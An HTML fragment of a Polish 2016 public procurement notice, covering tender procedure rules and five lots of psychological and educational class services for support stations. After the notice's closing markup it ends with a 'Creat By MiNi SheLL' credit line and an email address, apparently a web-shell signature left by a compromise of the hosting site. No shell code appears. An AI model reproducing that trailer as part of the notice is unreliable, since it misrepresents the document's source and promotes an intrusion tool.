              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />1) wykazu osób - załącznik nr 7do siwz, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami, potwierdzającego spełnienie warunku opisanego  w ust. 7 pkt. 7.2.3.
2)oświadczenie, że osoby skierowanych przez wykonawcę do realizacji zamówienia publicznego posiadają  wymagane  wykształcenie/ i kwakifikacje zawodowe, jeżeli ustawy nakładają obowiązek  posiadania takich uprawnień.<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px"></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>doświadczenie zawodowe</td><td>40</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />Za zgodą Zamawiającego Dopuszcza się wprowadzenie zmian w zawartej umowie w stosunku do treści oferty na podstawie, której dokonano wyboru wykonawcy w następujących przypadkach: 
a. zmian ceny brutto  w przypadku zmiany stawki podatku VAT,
b. aktualizację danych Wykonawcy i Zamawiającego poprzez: zmianę nazwy firmy, zmianę adresu siedziby, zmianę formy prawnej itp., 
c. zmianę terminów realizacji zamówienia z przyczyn niezależnych od Wykonawcy lub Zamawiającego, które to przyczyny każda ze Stron musi udokumentować, pod warunkiem, że takiej zgody udzieli instytucja dofinansowująca i, że Zamawiający nie straci dofinansowania 
d. jeżeli nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia,
e. ze względu na dofinansowane zadania możliwa jest zmiana umowy w zakresie konieczności dostosowania umowy z Wykonawcą do postanowień umowy o dofinansowanie. 
f.	zmiany sposobu rozliczania umowy lub dokonywania płatności. 
g. zmiany stawki podatku w przypadku zmiany przepisów dotyczących podatku,
h. zmiany przewidziane ustawą Prawo zamówień publicznych (tj. Dz. U. z 2015 r. poz. 2164 z późn. zm.)
i. pozostałe kwestie odnoszące się do umowy, zostały zawarte we wzorze umowy stanowiącym Załączniki Nr 8 do SIWZ.
<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 24/11/2016, godzina: 10:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              <br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>1
                  
                <b>Nazwa: </b>Usługa psychologiczna  pełnienie dyżuru przez psychologa <br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Usługa psychologiczna  pełnienie dyżuru przez psychologa (średnio 6h/mcs. w każdej z sześciu  Stacji  Wsparcia, ale może zaistnieć potrzeba zrealizowania innej ilości godzin w danym miesiącu. Łącznie na cały okres realizacji zamówienia 432 godz.). W ramach zadania  psycholog będzie prowadzić: diagnozę psychologiczną, opiniowanie i udzielenie pomocy psychologicznej, doradztwo psychologiczne, karty  obserwacji  raportów z przeprowadzonego doradztwa i wsparcia psychologicznego o charakterze indywidualnym  i grupowym. W ramach zadania osoba pełniąca dyżur psychologa winna opracować harmonogram wg którego będzie pełnić dyżur.<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>85121270-6<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  134868.29<br />
                  Waluta:
                  <br /><div style="padding-left: 20px">PLN<br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 30/09/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>Doświadczenie osoby wskazanej  w wykazie osób 	doświadczenie zawodowe w wykonywaniu zawodu psychologa</td><td>20</td></tr><tr><td>Doświadczenie osoby wskazanej  w wykazie osób zawodowe w zakresie pomocy społecznej lub pieczy zastępczej</td><td>20</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>2
                  
                <b>Nazwa: </b>Usługa edukacyjna  prowadzenie zajęć  rytmicznych  Step - up lub zumba <br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Usługa edukacyjna  prowadzenie zajęć  rytmicznych  Step - up lub zumba (średnio 4h/msc.  w każdej z sześciu  Stacji  Wsparcia,  ale może zaistnieć potrzeba zrealizowania innej ilości godzin w danym miesiącu. Łącznie na cały okres realizacji zamówienia 288 godz.). W ramach  zadania osoba prowadząca zajęcia  winna: opracować w ciągu 3 dni od podpisania umowy scenariusze i harmonogram wg., których będzie prowadzić zajęcia i uzgodnić je z kierownikiem projektu Bielińskie stacje wsparcia; wykonać  sprawozdania z realizacji zajęć; rozwijać  zainteresowania  i umiejętności  uczniów poprzez ekspresję i indywidualne predyspozycje. <br /><b>2) Wspólny Słownik Zamówień (CPV): </b>80410000-1<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  65560.98<br />
                  Waluta:
                  <br /><div style="padding-left: 20px">PLN<br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 30/09/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>Doświadczenie zawodowe osoby wskazanej  w wykazie osób 	 </td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>3
                  
                <b>Nazwa: </b>Usługa edukacyjna  prowadzenie zajęć  plastyczno  rękodzielniczych  Świat wyobraźni  <br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Usługa edukacyjna  prowadzenie zajęć  plastyczno  rękodzielniczych  Świat wyobraźni  (średnio 4 h  w każdej z sześciu  Stacji  Wsparcia, ale może zaistnieć potrzeba zrealizowania innej ilości godzin w danym miesiącu. Łącznie na cały okres realizacji zamówienia  288 godz.).
W ramach  zadania osoba prowadząca zajęcia  winna: opracować scenariusze i harmonogram w ciągu 3 dni od podpisania umowy  wg., których będzie prowadzić zajęcia i uzgodnić je z kierownikiem projektu Bielińskie stacje wsparcia; wykonać  sprawozdania z realizacji zajęć; rozwijać  zainteresowania  i umiejętności  uczniów poprzez ekspresję i indywidualne predyspozycje.
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>80410000-1<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  65560.98<br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 30/09/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>Doświadczenie zawodowe osoby wskazanej  w wykazie osób 	 </td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>4
                  
                <b>Nazwa: </b>Usługa edukacyjna  prowadzenie zajęć  z zakresu  animacji  kulturalnej teatralnej na scenie marzeń<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Usługa edukacyjna  prowadzenie zajęć  z zakresu  animacji  kulturalnej teatralnej Na scenie marzeń z elementami prawidłowej wymowy i dykcji średnio 4h  w każdej z sześciu  Stacji  Wsparcia, ale może zaistnieć potrzeba zrealizowania innej ilości godzin w danym miesiącu. Łącznie na cały okres realizacji zamówienia 288 godz. W ramach  zadania osoba prowadząca zajęcia  winna: opracować scenariusze i harmonogram w ciągu 3 dni od podpisania umowy wg., których będzie prowadzić zajęcia i uzgodnić je z kierownikiem projektu Bielińskie stacje wsparcia, wykonać  sprawozdania z realizacji zajęć; rozwijać  zainteresowania  i umiejętności  uczniów poprzez ekspresję i indywidualne predyspozycje.<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>80410000-1<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  65560.98<br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 30/09/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>Doświadczenie zawodowe osoby wskazanej  w wykazie osób 	 </td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>5
                  
                <b>Nazwa: </b>Usługa edukacyjna  prowadzenie zajęć   w zakresie  wiedzy  o regionie  Moja  mała Ojczyzna<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Usługa edukacyjna  prowadzenie zajęć   w zakresie  wiedzy  o regionie  Moja  mała Ojczyzna średnio 4h  w każdej z sześciu  Stacji  Wsparcia, ale może zaistnieć potrzeba zrealizowania innej ilości godzin w danym miesiącu. Łącznie na cały okres realizacji zamówienia 288 godz. Może zaistnieć konieczność prowadzenia zajęć w terenie.
W ramach  zadania osoba prowadząca zajęcia  winna: opracować scenariusze i harmonogram w ciągu 3 dni od podpisania umowy  wg., których będzie prowadzić zajęcia i uzgodnić je z kierownikiem projektu Bielińskie stacje wsparcia; wykonać  sprawozdania z realizacji zajęć; rozwijać  zainteresowania i umiejętności uczniów poprzez ekspresję i indywidualne predyspozycje.
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>80410000-1<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  65560.98<br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 30/09/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>Doświadczenie zawodowe osoby wskazanej  w wykazie osób 	</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com